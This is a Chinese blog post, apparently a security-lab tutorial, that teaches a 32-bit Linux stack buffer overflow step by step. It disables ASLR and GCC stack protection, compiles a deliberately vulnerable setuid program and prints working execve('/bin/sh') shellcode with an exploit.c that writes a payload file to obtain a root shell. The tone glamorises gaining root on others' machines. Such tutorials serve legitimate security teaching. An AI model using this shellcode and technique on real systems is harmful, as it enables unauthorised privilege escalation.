黑客从入门到入狱---不得不说的缓冲区溢出攻击

最新推荐文章于 2024-05-13 10:08:03 发布
最新推荐文章于 2024-05-13 10:08:03 发布
阅读量564 收藏 2
点赞数 2
分类专栏: 黑客从入门要入狱 文章标签: linux 安全 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42136832/article/details/109625815
版权

请同学们学到技术后不要到处伸张

简单介绍:什么是缓冲区溢出攻击

缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。

之前要接触的技能
有c语言基础
会进制转换以及计算
vim基本使用
熟悉基本linux命令

实验在蓝桥实验楼上可以进行,用的是linux系统

同学们已经饥渴难耐了,我们马上开始

三军未动,粮草先行

随着黑客技术的发展,黑客的防护措施也越来越发达了,那么为了我们的实验能够成功,我们做一个准备工作

输入命令安装一些用于编译32位c程序的软件包:

sudo apt-get update
sudo apt-get install -y lib32z1 libc6-dev-i386 lib32readline6-dev
sudo apt-get install -y python3.6-gdbm gdb

菜鸟初学,定点射击,感受黑客的快感!

关闭地址空间随机化,内存地址不用猜,收到擒来!

我们要找到地址的返回地址,用shellcode的地址覆盖着个返回地址来完成入侵,那么这个空间如果是随机化的就会增加我们的入侵难度,既然是入门,我先不让地址移动,定点射击。

sudo sysctl -w kernel.randomize_va_space=0

在这里插入图片描述

防止/bin/bash的防护措施,我们移花接木,瞒天过海

zsh代替bash 秒啊!

sudo su
cd /bin
rm sh
ln -s zsh sh
exit

俯冲进入linux32系统,冲冲冲!

linux32
/bin/bash

在这里插入图片描述

shellcode分析

#include <stdio.h>
int main()
{
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
}

其实就是用execve来调用/bin/sh里面的程序,这里面的程序可以获得root的权限,所以如果别人不小心调用了我们的这个shellcode,我们就可以获得对面主机的root权限。

shellcode对应的汇编版本

\x31\xc0\x50\x68"//sh"\x68"/bin"\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

漏洞程序分析

在/tmp目录下新建一个stack.c文件:

cd /tmp
vim stack.c

通过代码可以知道,程序会读取一个名为“badfile”的文件,并将文件内容装入“buffer”

/* stack.c */

/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}

撕碎gcc编译器的最后一道心理防线

不仅让人想起欧文所写的人性的弱点,人的心理防线恐怕就是最后一道防线了!

sudo su
gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
chmod u+s stack
exit

GCC编译器有一种栈保护机制来阻止缓冲区溢出,所以我们在编译代码时需要用** –fno-stack-protector** 关闭这种机制。 而 -z execstack 用于允许执行栈。

-g 参数是为了使编译后得到的可执行文档能用 gdb 调试

攻击程序分析(攻击刚才的漏洞程序)

我们的目的是攻击刚才的漏洞程序,并通过攻击获得 root 权限。

在 /tmp 目录下新建一个 exploit.c 文件,输入如下内容:

/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0" //xorl %eax,%eax
    "\x50"     //pushl %eax
    "\x68""//sh" //pushl $0x68732f2f
    "\x68""/bin"     //pushl $0x6e69622f
    "\x89\xe3" //movl %esp,%ebx
    "\x50"     //pushl %eax
    "\x53"     //pushl %ebx
    "\x89\xe1" //movl %esp,%ecx
    "\x99"     //cdq
    "\xb0\x0b" //movb $0x0b,%al
    "\xcd\x80" //int $0x80
    ;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");   //在buffer特定偏移处起始的四个字节覆盖sellcode地址  
    strcpy(buffer + 100, shellcode);   //将shellcode拷贝至buffer,偏移量设为了 100

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

注意上面的代码,\x??\x??\x??\x??处需要添上 shellcode 保存在内存中的地址,因为发生溢出后这个位置刚好可以覆盖返回地址。而 strcpy(buffer+100,shellcode); 这一句又告诉我们,shellcode 保存在 buffer + 100 的位置。下面我们将详细介绍如何获得我们需要添加的地址。
现在我们要得到 shellcode 在内存中的地址,输入命令进入 gdb 调试:

gdb stack
disass main

结果如图:
在这里插入图片描述
esp 中就是 str 的起始地址,所以我们在地址 0x080484ee 处设置断点。
接下来的操作:

# 设置断点
b *0x080484ee
r
i r $esp

在这里插入图片描述
最后获得的这个0xffffcfb0就是str的地址
按 q 键,再按 y 键可退出调试。
根据语句 strcpy(buffer + 100,shellcode); 我们计算 shellcode 的地址为 0xffffcfb0 + 0x64 = 0xffffd014

实际操作中你的地址和我这里的地址可能不一样,需要根据你实际输出的结果来计算。
十六进制加法计算器
现在修改 exploit.c 文件,将 \x??\x??\x??\x?? 修改为计算的结果 \x14\xd0\xff\xff,注意顺序是反的。
然后,编译exploit.c程序:

gcc -m32 -o exploit exploit.c

瞬间入侵

在这里插入图片描述

一些思考题,我们升华一下?!

将/bin/sh重新指向/bin/bash或者(/bin/dash),能否攻击成功,获得root权限呢?

/bin/bash自带有防护措施,前面说过是最后一道心理防线,那么肯定是不能成功,结果图如下。
在这里插入图片描述

为什么是填充24个字节的0x90???

在这里插入图片描述

关闭地址随机后,正常的是本地变量buffer内存,之后四个字节是ebp,然后就是返回的地址了!
那么为什么我们这里不是12+4=16而是24呢?

在漏洞程序中我们调用bof函数来完成缓冲区的溢出,我们用gdb来查看bof分配的内存是多少!!!
结果显示函数分配了0x14的地址也就是20,所以是20+4=24!!!
在这里插入图片描述

我们要得到shellcode在内存的地址,为什么是查看stack的内存

我们可以通过查看stack的首地址来得到str的首地址,而shellcode存在了str+100的位置,所以得到的这个地址+0x64(100)就是shellcode的地址拉!

将 \x??\x??\x??\x?? 修改为 \x14\xd2\xff\xff (为什么是反过来填写?)

在这里插入图片描述

端类型表示方法
大端在这里插入图片描述
小端在这里插入图片描述

一目了然,无需多言!

特别感谢程佬,董总,龙王的技术支持和代码指导!

在这里插入图片描述

最后放一下佬们的手机壳!!!呵呵

在这里插入图片描述

钧桐
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
黑客零基础教学:从开机到入狱
Karka_的博客
10-09 39
你想成为黑客吗?你想在电脑前动动手就探知一个人全部的秘密吗?你想默默搜集信息,揭露一个惊天阴谋吗?现在,就是你化身为一个网络幽灵的好时机!别误会,我的就是本期超游的话题游戏《全网公敌》steam游戏封面这是一款可以充分满足你成为一名黑客的策略模拟游戏。游戏结合了现实中发生的真实案例,以及多种真实的网络安全技术。让玩家深度体作为一名网络黑客,是如何一步一步通过各种专业手段,达到窃取,探查,甚至攻击的目的。《全网公敌》这款游戏,利用游戏的关卡设计,告诉我们很多黑客的常用技术。
Linux kernel Exploit 内核漏洞学习(1)-Double Fetch
钞sir的博客
07-25 1万+
简介 Double Fetch从漏洞原理上讲是属于条件竞争漏洞,是一种内核态与用户态之间的数据存在着访问竞争;而条件竞争漏洞我们都比较清楚,简单的来就是多线程数据访问时,并且没有对数据做必要的安全同步措施;当多线程时,对于同一数据有一个线程在读而有另外一个线程在写,这就可能引起数据的访问异常,而此时如果这个异常访问情况发生在内核与用户线程之间时,就触发double fetch漏洞了… 为了简化漏......
探索Linux内核安全漏洞:一个全面的exploit集合
最新发布
gitblog_00040的博客
05-13 288
探索Linux内核安全漏洞:一个全面的exploit集合 项目地址:https://gitcode.com/xairy/kernel-exploits 在这个数字化时代,了解和防御操作系统层面的安全威胁至关重要。Linux kernel exploits 是一个精心编译的开源项目,专门收集并提供了自2016年以来多个Linux内核漏洞的exploit示例。这些exploits涉及各种技术细节,对于...
Linux kernel Exploit 内核漏洞学习(0)-环境安装
热门推荐
钞sir的博客
07-24 1万+
前言 在Linux上面搞事情很多东西都可能需要我们利用源码来自己编译,相对于Windows来讲可能会比较麻烦和耗时,这个过程中肯定会遇到很多报错,所以一定要有耐心… 方法步骤 编译内核 首先到linux内核的官网下载一份内核源代码并解压: 至于需要下载的版本,随意就好,我下载的是5.2.1的… 然后先安装有些依赖: sudo apt-get install git fakeroot build-...
Linux实验——缓冲区溢出漏洞实验
weixin_30855761的博客
04-23 462
Linux实验——缓冲区溢出漏洞实验 20125102 王朝阳 一、 实验描述 缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。 二、 实验准备 实验楼提供的是64位Ubuntu linux(系统用户名shiy...
Serv-U防溢出提权攻击解决设置方法
09-30
早期的Serv-U版本存在缓冲区溢出漏洞,例如FTP MDTM命令和LIST命令的超长-l参数,这些漏洞可能导致服务器被恶意控制。虽然新的Serv-U版本已经修复了这些溢出漏洞,但黑客总是寻找新的攻击方式,如利用Serv-U的本地...
Linux中的基本x86-64bit缓冲区溢出
04-03
在IT安全领域,缓冲区溢出是常见的漏洞类型,尤其在x86-64bit架构的Linux系统中。这个话题对于白帽黑客和系统管理员来至关重要,因为理解这种漏洞可以帮助预防潜在的安全风险。本文将深入探讨Linux环境下的x86-64...
论文研究-基于多维Fuzzing的缓冲区溢出漏洞挖掘技术研究.pdf
07-22
缓冲区溢出漏洞一直是计算机安全威胁中最为严重的漏洞之一,在黑客发现利用前检测出漏洞并及时修复极为重要;基于多维Fuzzing设计和实现了一种缓冲区溢出漏洞挖掘模型MFBOF,应用输入样本结构知识、结合静态二进制...
C++编程入门到精通-卷1-基础语法
06-30
《C++编程入门到精通》系列课程是由WangTeacher精心制作一部视频教学实战课程,共分为八卷:卷1-基础语法、卷2-对象和类、卷3-C++11新特性、卷4-标准库、卷5-标准模板库、卷6-智能指针、卷7-面试讲解、卷8-C++新特性...
软件安全实验——lab10(一、基于时间的侧信道攻击)
Onlyone_1314的博客
08-14 1204
目录标题(1)漏洞代码:(2)将密码文件s.pass设为root只读:(3)攻击代码为:(4)可执行栈-z execstack选项:(5)设置sidechannel文件的权限:(6)只有完成上面的步骤开始攻击: 边信道攻击实验:   通过使用下面所提供的漏洞代码,设计一个攻击代码,利用边信道攻击的方式获取正确的密码,并执行后面的 shellcode 来获取一个 root shell,其中的s.pass 为 root 只读的密码文件。过程如下: (1)漏洞代码: //sidechannel.c //s.pas
原稿是《黑手缓冲区溢出教程》资源是一个叫美丽の破船的人打出来了,感谢他的工作,我也学习到了很多的东西,所以推荐给大家,特别是做C++码砖头的小程序员来!另外还有美丽破船码的程序。
10-29
写得比较轻松活泼,而且比较容易理解! 第一章、Windows下堆栈溢出入门 8 1.1 梦,已经展开 8 1.2 啤酒和杯子――缓冲区溢出原理 8 1.3 神秘的Windows系统 10 1.4 ShellCode编写简介 17 1.5 窥豹一斑――本地缓冲区溢出简单利用 21 1.6 小结——摘自小强的日记 28 1.7 首次实战――FoxMail溢出漏洞编写 29 1.8 牛刀小试――Printer溢出漏洞编写 41 1.9 JMP /CALL EBX——另一种溢出利用方式 42 1.10 拾阶而上——IDA/IDQ溢出漏洞编写 55 课后解惑 58 第二章、Windows下ShellCode编写初步 60 2.1 ShellCode是什么? 60 2.2 简单的例子——编写控制台窗口的ShellCode 63 2.3 ShellCode通用性的初步分析 78 2.4 弹出Windows对话框ShellCode的编写 82 2.5 添加用户ShellCode的编写 88 课后解惑 98 第三章、后门的编写和ShellCode的提取 100 3.1 预备知识 101 3.2 后门总体思路 121 3.3 Telnet后门的高级语言实现 125 3.4 生成ShellCode 136 3.5 进一步的探讨 156 3.6 反连后门ShellCode的编写 160 课后解惑 166 第四章 Windows下堆溢出利用编程 168 4.1 堆溢出初探 168 4.2 RtlAllcoateHeap的失误 170 4.3 实例——Message堆溢出漏洞的利用 191 4.4 RtlFreeHeap的失误 197 4.5 堆溢出的其他利用方式 204 4.6 实例——JPEG处理堆溢出漏洞的利用 208 课后解惑 215 第五章 ShellCode变形编码大法 217 5.1 为什么要编码 217 5.2 简单的编码——异或大法 221 5.3 简便的变形——微调法 231 5.4 直接替换法 233 5.5 字符拆分法 239 5.6 内存搜索法 247 5.7 搜索实例——Serv_U漏洞的利用 249 5.8 “计算与你同行”—— Computing & Society 257 课后解惑 258 第六章 ShellCode编写高级技术 260 6.1 通用ShellCode的编写 260 6.2 ShellCode的高效提取技巧 285 6.3 ShellCode的高级功能 294 课后解惑 305 第七章、漏洞的发现、分析和利用 308 7.1 CCProxy 漏洞的分析 308 7.2 黑盒法探测漏洞和Python脚本 319 7.3 白盒法和IDA分析漏洞 333 尾声 347
Linux kernel exploit 研究和探索
12-30
经常听一些人讨论内核溢出的一些事情,比起应用层有 哪些异同?有何应用?如何定位溢出点,以及如何定位 shellcode等。 w 希望通过这篇文章,你能找到上面问题的答案,并且自 己也能够写出内核级别的exploit。 w 由于作者本人水平有限,所以欢迎各位大虾指正! w 欢迎国内对内核exploit技术的爱好者来信探讨技术,来 信mail至:alert7@xfocus.org或者 e4gle@whitecell.org
GCC 安全编译选项
云守护的专栏
06-01 3399
https://gohalo.me/post/program-c-gcc-security-options.html 操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险,例如 ASLR、NX 等等,这里简单介绍一些常见的使用项。 简介 操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险,例如 NX ASLR PIE CANARY FORTIFY RELRO 等手段,存在 NX 的话就不能直接执行栈上的数据,存在 ASLR 的话各个系统调用的地址就是随机化的等等。
缓冲区溢出攻击
Eastbrook_Liu的博客
01-22 1808
缓冲区溢出(Buffer Overflow)是计算机安全领域内既经典而又古老的话题。随着计算机系统安全性的加强,传统的缓冲区溢出攻击方式可能变得不再奏效,相应的介绍缓冲区溢出原理的资料也变得“大众化”起来。
缓冲区溢出笔记之---STACK溢出
10-25 1256
i.预备知识ii.溢出原理演示iii.三种常用溢出方法演示及实例分析本来预备讲的东西很多,后来由于篇幅过长原因,所以其他一些内容就没有再讲了,比如与环境变量传递的BUF有关的溢出(通过setenv(),putenv()等函数传递环境变量到BUF),以及一些实例分析.这篇是我在学习BUFFER OVERFLOW过程中的一些心得,算是一个总结,同时也希望能帮助那些需要的朋友们.1.预备知识由于篇幅问题
阻止缓冲区溢出攻击
李晨光原创IT博客
05-19 492
升级中。。。。  本文出自 “李晨光原创技术博客” 博客,谢绝转载!
黑客----从入门入狱到入土的理论基础
usingnstd的博客
02-12 900
(假黑客乱入) 少年,在你看到这篇文章的第一秒 你就迈出了第一步 **(即从入门入狱到入土的生涯中最关键的一步)。 毕竟没入门入狱的资格都没有** 命令简介 cmd是command的缩写.即命令行 。 虽然随着计算机产业的发展,Windows 操作系统的应用越来越广泛 (广泛的想砸电脑) 运行操作 CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、...
黑客青睐:深入解析溢出缓冲区漏洞渗透技巧
2. 方法与类型:书中详述了渗透测试人员常用的缓冲区溢出攻击方法和不同类型,如基于栈溢出、堆溢出和格式化字符串漏洞等,这些都是攻击者获取程序控制权的常见手段。 3. 逆向工程:作者还将涉及如何通过逆向工程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值